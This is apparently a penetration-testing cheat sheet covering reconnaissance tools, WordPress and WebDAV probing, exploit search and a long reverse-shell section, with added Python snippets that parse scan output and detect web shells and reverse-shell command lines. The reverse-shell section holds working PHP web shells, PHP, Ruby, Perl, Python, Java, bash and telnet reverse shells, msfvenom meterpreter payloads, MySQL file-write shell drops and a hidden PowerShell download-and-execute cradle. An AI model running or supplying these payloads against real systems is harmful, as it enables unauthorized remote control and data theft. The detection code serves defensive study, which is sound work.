Information Gathering Stage
Port scanning
Nmap
Network exploration tool and security/ port scanner
```
nmap [Scan Type] [Options] {target specification}

HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn/-sP: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
PORT SPECIFICATION:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
```
Unicornscan
A port scanner that utilizes its own userland TCP/IP stack, which allows it to run asynchronous scans. It can scan 65,535 ports in a relatively short time frame.
```
unicornscan [options] X.X.X.X/YY:S-E
  -i, --interface : interface name, like eth0 or fxp1, not normally required
  -m, --mode      : scan mode, tcp (syn) scan is default, U for udp, T for tcp,
                    `sf' for tcp connect scan and A for arp
                    for -mT you can also specify tcp flags following the T, like -mTsFpU,
                    which would send tcp syn packets with (NO Syn|FIN|NO Push|URG)
```
Address ranges are given in CIDR notation, e.g. 1.2.3.4/8 for all of 1.?.?.?; if you omit the mask, /32 is implied. Port ranges look like 1-4096 (53 alone scans a single port); `a` means all 65k ports and `p` means 1-1024. Example:
```
unicornscan 192.168.1.5:1-4000 gateway:a
```
This scans ports 1-4000 on 192.168.1.5 and all 65K ports on the host named gateway.
Netcat
Netcat might not be the best tool to use for port scanning, but it can be used quickly. While Netcat scans TCP ports by default it can perform UDP scans as well.
1.1.3 TCP Scan
For a TCP scan, the format is:
```
nc -vvn -z xxx.xxx.xxx.xxx startport-endport
```
- -z: zero-I/O mode (used for scanning)
- -vv: verbose output about the results
- -n: skip the DNS lookup
1.1.4 UDP Scan
For a UDP Port Scan, we need to add the -u flag which makes the format:
```
nc -vvn -u -z xxx.xxx.xxx.xxx startport-endport
```
Amap – Application mapper
Identifies which services are running on a given port.
```
amap -A 192.168.1.120 1111
amap v5.4 (www.thc.org/thc-amap) started at 2016-08-10 05:48:09 - APPLICATION MAPPING mode
Protocol on 192.168.1.2:1111/tcp matches http
Protocol on 192.168.1.2:1111/tcp matches http-apache-2
Protocol on 192.168.1.2:1111/tcp matches ntp
Protocol on 192.168.1.2:1111/tcp matches ssl
```
DNS enumeration
DNS Server
If the targeted machine is running a DNS server and we have a possible domain name, we can try to find its A, MX and AAAA records, or attempt a zone transfer to discover other domain names.
```
host <domain> <optional_name_server>
host -t ns <domain>            # Name servers
host -t a <domain>             # A record (IPv4 address)
host -t aaaa <domain>          # AAAA record (IPv6 address)
host -t mx <domain>            # Mail servers
host -t soa <domain>           # Start of Authority
host <IP>                      # Reverse lookup
host -l <domain> <DNS server>  # Domain zone transfer
```
Example:
```
host scanme.nmap.org
scanme.nmap.org has address 45.33.32.156
scanme.nmap.org has IPv6 address 2600:3c01::f03c:91ff:fe18:bb2f
```
SSL Certificate
If the targeted machine is running an HTTPS server and https://IPAddress returns the Apache default page, virtual hosts are probably in use. Check the alternative DNS names on the SSL certificate, add entries for them to the hosts file (/etc/hosts) pointing at the target IP, and browse to https://alt-dns-name to see what is hosted under each name.
nmap service scan result for port 443 (sample):
```
| ssl-cert: Subject: commonName=examplecorp.com/organizationName=ExampleCorp Ltd./stateOrProvinceName=Attica/countryName=IN/localityName=Mumbai/organizationalUnitName=IT/emailAddress=admin@examplecorp.com
| Subject Alternative Name: DNS:www.examplecorp.com, DNS:admin-portal.examplecorp.com
```
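Turning the certificate names into hosts-file entries is tedious by hand when a certificate carries many SANs. The following is an added example (not from the original page or from nmap) that parses the `ssl-cert` script output shown above and produces the `/etc/hosts` line for the scanned IP. The sample output, the IP 203.0.113.10 and the function names are constructed for this example.

```python
import re

# Constructed sample, shaped like the nmap ssl-cert output shown above (not a real host).
SAMPLE_SSL_CERT_OUTPUT = """\
| ssl-cert: Subject: commonName=examplecorp.com/organizationName=ExampleCorp Ltd./stateOrProvinceName=Attica/countryName=IN/localityName=Mumbai/organizationalUnitName=IT/emailAddress=admin@examplecorp.com
| Subject Alternative Name: DNS:www.examplecorp.com, DNS:admin-portal.examplecorp.com, IP Address:203.0.113.10
| Not valid before: 2016-01-01T00:00:00
|_Not valid after:  2017-01-01T00:00:00
"""


def cert_hostnames(script_output):
    """Collect the commonName and every DNS: SAN entry, in order, without duplicates.
    IP-address SANs are skipped because they do not belong in a hosts file."""
    names = []
    cn = re.search(r"commonName=([^/\s]+)", script_output)
    if cn:
        names.append(cn.group(1).lower())
    san_line = re.search(r"Subject Alternative Name:\s*(.+)", script_output)
    if san_line:
        for entry in san_line.group(1).split(","):
            entry = entry.strip()
            if not entry.startswith("DNS:"):
                continue
            name = entry[len("DNS:"):].strip().lower()
            if name.startswith("*."):
                # A wildcard SAN: record the bare domain as a hint; the real
                # subdomains still have to be guessed or found elsewhere.
                name = name[2:]
            if name and name not in names:
                names.append(name)
    return names


def hosts_line(ip, script_output):
    """One /etc/hosts line mapping the scanned IP to every hostname in the certificate."""
    names = cert_hostnames(script_output)
    return f"{ip} {' '.join(names)}" if names else ""


if __name__ == "__main__":
    print(hosts_line("203.0.113.10", SAMPLE_SSL_CERT_OUTPUT))
```

The output line can be appended to /etc/hosts as-is; a defender reading the same certificate learns exactly which internal hostnames the certificate leaks to anyone who connects to port 443.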
Scanning Structure
Google-Vulns
Whenever you google something, add words such as vulnerability, exploit, ctf, github, python or tool to the search term. For example, if you are stuck inside a Docker container or on a specific CMS, search for "docker ctf" or "<cms_name> ctf" / "<cms_name> github".
Webservices
Use whatweb to find out which software stack a server is running.
```
whatweb www.example.com
http://www.example.com [200 OK] Cookies[ASP.NET_SessionId,CMSPreferredCulture,citrix_ns_id], Country[INDIA][IN], Email[infosecurity@zmail.example.com], Google-Analytics[Universal][UA-6386XXXXX-2], HTML5, HTTPServer[Example Webserver], HttpOnly[ASP.NET_SessionId,CMSPreferredCulture,citrix_ns_id], IP[XXX.XX.XX.208], JQuery[1.11.0], Kentico-CMS, Modernizr, Script[text/javascript], Title[Welcome to Example Website ][Title element contains newline(s)!], UncommonHeaders[cteonnt-length,x-cache-control-orig,x-expires-orig], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=9,IE=edge]
```
1.3.3 nikto
nikto – scans a web server for known vulnerabilities.
It will examine a web server to find potential problems and security vulnerabilities, including:
- Server and software misconfigurations
- Default files and programs
- Insecure files and programs
- Outdated servers and programs
1.3.4 dirb, wfuzz, dirbuster
Furthermore, we can run the following programs to find any hidden directories.
- DIRB is a Web Content Scanner. It looks for existing (and/ or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
- wfuzz – a web application brute-forcer. Wfuzz is useful when you are looking for a response of a certain size. For example, say dirb returns 50 directories, each containing an image, and we need to find out which image is different. We determine the size of the normal image and hide responses of that size with wfuzz.
- Dirbuster : DirBuster is a multi-threaded java application designed to brute force directories and files names on web/ application servers.
- gobuster : Gobuster is a tool used to brute-force URIs (directories and files) in websites and DNS subdomains (with wildcard support). (golang can be installed using apt-get).
1.3.5 BurpSuite Spider
There will be cases when dirb/dirbuster don't find anything. This happened to us on a Node.js web application. Burp Suite's spider helped in finding extra pages which contained the credentials.
1.3.6 PUT Method
Sometimes it is also a good idea to check which HTTP verbs are available, such as GET, PUT, DELETE, etc. This can be done with an OPTIONS request. curl can be used to check the supported HTTP verbs:
```
curl -X OPTIONS -v http://192.168.126.129/test/
*   Trying 192.168.126.129...
* Connected to 192.168.126.129 (192.168.126.129) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.126.129
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Fri, 29 Apr 2016 09:41:19 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.126.129 left intact
```
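The interesting part of that exchange is the `Allow` header (sent twice here) and the `DAV` header, which together say the path accepts write methods over WebDAV. The following added example (not from the page or from curl or lighttpd) parses a raw OPTIONS response like the one above and reports which advertised methods can create, modify or delete content, so that the same check can be run across many paths or fed into a hardening review. The response text is constructed from the sample above; the function names and the `WRITE_METHODS` set are this example's own.

```python
# Constructed response, shaped like the curl -v exchange shown above.
SAMPLE_OPTIONS_RESPONSE = """\
HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Server: lighttpd/1.4.28

"""

# Methods that create, change or delete server-side content (this example's own list).
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK", "PATCH"}


def parse_headers(raw):
    """Parse raw response text into (name, value) pairs. Repeated headers such as
    Allow are kept as separate pairs rather than collapsed."""
    headers = []
    for line in raw.split("\n")[1:]:  # skip the status line
        line = line.rstrip("\r")
        if not line:
            break  # blank line ends the header block
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def allowed_methods(raw):
    """Union of every Allow header, in order of appearance, without duplicates."""
    methods = []
    for name, value in parse_headers(raw):
        if name != "allow":
            continue
        for m in value.split(","):
            m = m.strip().upper()
            if m and m not in methods:
                methods.append(m)
    return methods


def assess_options(raw):
    """Summarise what the server advertises: all methods, the write-capable subset,
    and whether a DAV header is present (WebDAV enabled on that path)."""
    methods = allowed_methods(raw)
    header_names = {name for name, _ in parse_headers(raw)}
    return {
        "allowed": methods,
        "writable": sorted(m for m in methods if m in WRITE_METHODS),
        "webdav": "dav" in header_names,
    }


if __name__ == "__main__":
    print(assess_options(SAMPLE_OPTIONS_RESPONSE))
```

A non-empty `writable` list on a path that is meant to be read-only is the finding to report; on the lighttpd sample above it lists PUT together with the WebDAV methods, which is why the next section can upload a file there.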
The PUT method allows uploading a file, which can help us get a shell on the machine. Several ways of uploading a file with the PUT method are described in Detecting and exploiting the HTTP PUT Method.
A few are:
- Nmap:
```
nmap -p 80 --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php'
```
- curl:
```
curl --upload-file test.txt -v --url http://192.168.126.129/test/test.txt
```
or
```
curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://IPAddress/newpage
curl -X PUT -d "text or data to put" http://IPAddress/destination_page
curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://IPAddress/new_page
```
1.3.7 WordPress
When faced with a website that uses the WordPress CMS, run wpscan. Make sure you pass `--enumerate u` to enumerate usernames, because wpscan does not do that by default. Also scan for plugins.
```
wpscan
  --url | -u <target url>       The WordPress URL/domain to scan.
  --force | -f                  Forces WPScan to not check if the remote site is running WordPress.
  --enumerate | -e [option(s)]  Enumeration.
    option :
      u        usernames from id 1 to 10
      u[10-20] usernames from id 10 to 20 (you must write [] chars)
      p        plugins
      vp       only vulnerable plugins
      ap       all plugins (can take a long time)
      tt       timthumbs (vulnerability scanner)
      t        themes
      vt       only vulnerable themes
      at       all themes (can take a long time)
    Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
    If no option is supplied, the default is "vt,tt,u,vp"
    (only vulnerable themes, timthumbs, usernames from id 1 to 10, only vulnerable plugins)
```
We can also use wpscan to bruteforce passwords for a given username
```
wpscan --url http://192.168.1.2 --wordlist wordlist.txt --username example_username
```
Exploit Enumeration
Secploit Terminal Search Engine
It is a web tool that makes it easy to search for exploits by name or by tags.
```
user@secploit # search --name ubuntu
```
We can also search for a specific vulnerability class in a specific piece of software using tags:
```
user@secploit # search --tags cisco rce
```
searchsploit
Exploit Database offline archive search for vulnerable software, shells and papers.
First of all, we check whether the operating system and/or the exposed services are vulnerable to exploits that are already available on the internet. For example, a vulnerable Webmin service is present in one of the VMs and could be exploited to extract information from the system.
```
root@kali:~# nmap -sV -A 172.16.73.128
**********Trimmed**************
10000/tcp open  http    MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version:
|_  ERROR: Failed to get host information from server
**********Trimmed**************
```
If we search for webmin with searchsploit, we find several exploits for it and just have to pick the correct one based on utility and the matching version.
```
root@kali:~# searchsploit webmin
**********Trimmed**************
 Description                                                                 |  Path
----------------------------------------------------------------------------------------------------
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          | /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   | /multiple/remote/2017.pl
Webmin 1.x HTML Email Command Execution Vulnerability                        | /cgi/webapps/24574.txt
**********Trimmed**************
```
Once we have figured out which exploit to check, we can read it using its file number, e.g. 1997, 2017 or 24574 in the above case:
```
searchsploit -x 24674
```
Searchsploit can also read an nmap XML file and suggest matching exploits (requires a scan saved with `nmap -sV -oX file.xml`):
```
searchsploit --nmap [file.xml]
```
Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml). Use "-v" (verbose) to try even more combinations.
Reverse Shells
PHP Web Shell
```
<?php system($_GET["cmd"]); ?>
```
or
```
<?php echo shell_exec($_GET["cmd"]); ?>
```
or
```
<? passthru($_GET["cmd"]); ?>
```
which can then be accessed by
```
http://IP/shell.php?cmd=id
```
If there is a webpage that accepts PHP code to execute, we can use curl to URL-encode the payload and run it:
```
curl -G -s http://10.X.X.X/page.php?data= --data-urlencode "html=<?php passthru('ls -lah'); ?>" -b "somecookie=somevalue" | sed '/<html>/,/<\/html>/d'
```
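All three one-liners above share one shape: a PHP command-execution function fed straight from request input. That shape is also what a defender looks for when checking a web root or an uploads directory for dropped shells. The following is an added example (not from the page) that scans PHP sources for those primitives; the rule names, the `scan_*` functions and the sample file tree are constructed for this example, and the patterns are deliberately narrow so they can be extended per environment.

```python
import re

# Command-execution functions and request superglobals used by the one-line shells above.
EXEC_FUNCS = r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"

# (rule name, compiled pattern). Constructed for this example; not an exhaustive ruleset.
WEBSHELL_RULES = [
    ("exec-from-request", re.compile(EXEC_FUNCS + r"\s*\(\s*" + REQUEST_INPUT, re.I)),
    ("eval-from-request", re.compile(r"\beval\s*\(\s*" + REQUEST_INPUT, re.I)),
    ("exec-fixed-command", re.compile(EXEC_FUNCS + r"\s*\(\s*['\"]", re.I)),
    # `<?` without `php`: short open tags, as in the third shell above.
    ("short-open-tag", re.compile(r"<\?(?!php|=|xml)", re.I)),
]


def scan_php_source(source):
    """Return the names of the rules matched by one file's contents, in rule order."""
    return [name for name, rx in WEBSHELL_RULES if rx.search(source)]


def scan_tree(files):
    """files: dict of path -> contents (a stand-in for walking a web root).
    Returns {path: [rule, ...]} for files with hits, restricted to extensions
    the web server would execute as PHP."""
    hits = {}
    for path, content in files.items():
        if not path.lower().endswith((".php", ".phtml", ".phar", ".php5")):
            continue
        matched = scan_php_source(content)
        if matched:
            hits[path] = matched
    return hits


# Constructed sample tree: the three shells from this section, a benign page and an image.
SAMPLE_TREE = {
    "/var/www/html/shell.php": '<?php system($_GET["cmd"]); ?>',
    "/var/www/html/uploads/x.php": '<?php echo shell_exec($_GET["cmd"]); ?>',
    "/var/www/html/old.php": '<? passthru($_GET["cmd"]); ?>',
    "/var/www/html/index.php": '<?php echo "<h1>Hello</h1>"; $name = htmlspecialchars($_GET["name"] ?? ""); ?>',
    "/var/www/html/uploads/avatar.png": "\x89PNG...",
}

if __name__ == "__main__":
    for path, rules in scan_tree(SAMPLE_TREE).items():
        print(f"{path}: {', '.join(rules)}")
```

A real deployment would walk the document root with `os.walk`, compare hits against a known-good manifest of the application's files, and pay particular attention to anything executable under an uploads directory, since that is exactly where the PUT and MySQL `outfile` techniques on this page drop their files.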
- PHP Meterpreter
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw -o /tmp/payload.php
```
We can set up the multi-handler in Metasploit with:
```
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST yourIP
run
```
PHP Reverse Shell
The code below assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4 or 5 or 6.
```
php -r '$sock=fsockopen("192.168.1.2",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
```
Ruby
```
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```
Perl
```
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
Python
TCP
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
UDP
```
import os,pty,socket;s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(("10.10.14.17", 4445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE",'/dev/null');pty.spawn("/bin/sh");s.close()
```
Java
```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
JSP
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > runme.war
```
Bash
If a server (attacker machine) is listening on a port:
```
nc -lvp port
```
then we can use one of the following to connect back.
Method 1:
```
/bin/bash -i >&/dev/tcp/IP/Port 0>&1
```
Method 2:
```
exec 5<>/dev/tcp/IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or: while read line 0<&5; do $line 2>&5 >&5; done
```
Method 3:
```
0<&196;exec 196<>/dev/tcp/IP/Port; sh <&196 >&196 2>&196
```
We may execute the above using `bash -c "<above line>"`.
Telnet Reverse Shell
```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```
XTerm
```
xterm -display 10.0.0.1:1
```
To catch the incoming xterm, start an X server:
```
Xnest :1 -listen tcp
```
You'll need to authorize the target to connect to you (this command is also run on your host):
```
xhost +targetip
```
Lynx
URL to open:
```
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
```
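Every reverse shell in this section, from the PHP `fsockopen` one-liner to the bash `/dev/tcp` redirections and the telnet FIFO trick, leaves a recognisable command line on the victim host, which is what process-execution telemetry (auditd `execve` records, EDR process events) captures. The following added example (not from the page) runs a small set of detection rules over constructed process events whose command lines are taken from this section, and escalates severity when the parent user is a service account such as www-data, because an interactive shell from the web server's user almost always means the web application has been compromised. The event records, rule names and `SERVICE_ACCOUNTS` list are constructed for this example.

```python
import re

# (rule name, pattern over the process command line). Constructed for this example
# from the one-liners above; a production ruleset would be broader and tuned.
REVERSE_SHELL_RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("php-fsockopen-exec", re.compile(r"fsockopen\s*\(.*\b(?:exec|system|passthru|shell_exec)\s*\(", re.S)),
    ("python-socket-dup2", re.compile(r"socket\.socket\(.*\.connect\(.*dup2\(", re.S)),
    ("perl-socket-shell", re.compile(r"use Socket;.*connect\(.*exec\(", re.S)),
    ("ruby-tcpsocket-shell", re.compile(r"TCPSocket\.(?:open|new)\(.*exec\b", re.S)),
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-(?:e|c)\s")),
    ("telnet-fifo-shell", re.compile(r"mknod\s+\S+\s+p\b.*telnet\b", re.S)),
    # an interactive shell whose stdio is redirected to a file descriptor
    ("interactive-shell-fd", re.compile(r"/bin/(?:ba)?sh\s+-i\s*[<>]&")),
]

# Accounts that should never spawn an interactive shell toward the network.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres", "tomcat"}


def classify(cmdline):
    """Names of every rule the command line matches, in rule order ([] if none)."""
    return [name for name, rx in REVERSE_SHELL_RULES if rx.search(cmdline)]


def detect(events):
    """events: iterable of {"pid", "user", "cmdline"} process-start records.
    Returns one alert per matching event, with severity raised for service accounts."""
    alerts = []
    for ev in events:
        rules = classify(ev["cmdline"])
        if not rules:
            continue
        severity = "critical" if ev["user"] in SERVICE_ACCOUNTS else "high"
        alerts.append({"pid": ev["pid"], "user": ev["user"], "severity": severity, "rules": rules})
    return alerts


# Constructed process events: the first four reuse command lines from this section
# with placeholder addresses; the last three are benign activity that must not alert.
SAMPLE_EVENTS = [
    {"pid": 4101, "user": "www-data",
     "cmdline": "php -r '$sock=fsockopen(\"192.168.1.2\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"},
    {"pid": 4102, "user": "www-data",
     "cmdline": "bash -c '/bin/bash -i >&/dev/tcp/10.0.0.1/4444 0>&1'"},
    {"pid": 4103, "user": "alice",
     "cmdline": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                "s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
                "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"},
    {"pid": 4104, "user": "root",
     "cmdline": "sh -c 'rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 80 0/tmp/p'"},
    {"pid": 4105, "user": "alice", "cmdline": "nc -lvp 4444"},
    {"pid": 4106, "user": "root", "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 4107, "user": "alice", "cmdline": "ssh -i ~/.ssh/id_ed25519 alice@10.0.0.5"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] pid={alert['pid']} user={alert['user']} rules={','.join(alert['rules'])}")
```

The listener line `nc -lvp 4444` deliberately does not alert: listening is not the suspicious half of the exchange on the victim side, the outbound connect plus a shell bound to it is, so the rules key on the connect-and-redirect pattern rather than on the tool name alone.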
MYSQL
- If we have a MySQL shell via sqlmap or phpMyAdmin, we can use MySQL's outfile/dumpfile feature to upload a shell.
```
echo -n "<?php phpinfo(); ?>" | xxd -ps
3c3f70687020706870696e666f28293b203f3e
```
```
select 0x3c3f70687020706870696e666f28293b203f3e into outfile "/var/www/html/blogblog/wp-content/uploads/phpinfo.php";
```
or
```
SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';
```
- If you have a SQL shell from sqlmap/phpMyAdmin, you can read files with the load_file function.
```
select load_file('/etc/passwd');
```
Reverse Shell from Windows
```
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://YourIPAddress:8000/Invoke-Shellcode.ps1'); Invoke-Shel
```
Executable Meterpreter Payloads
```
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o met LHOST=10.10.XX.110 LPORT=4446
msfvenom -p windows/x86/meterpreter/reverse_tcp -f exe LHOST=10.10.XX.110 LPORT=4446
```
Secploit Online Reverse Shell Generator
```
user@secploit# shell bash 192.168.1.1 444
```
You can generate any other type the same way by choosing python, ruby, etc. instead of bash.
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects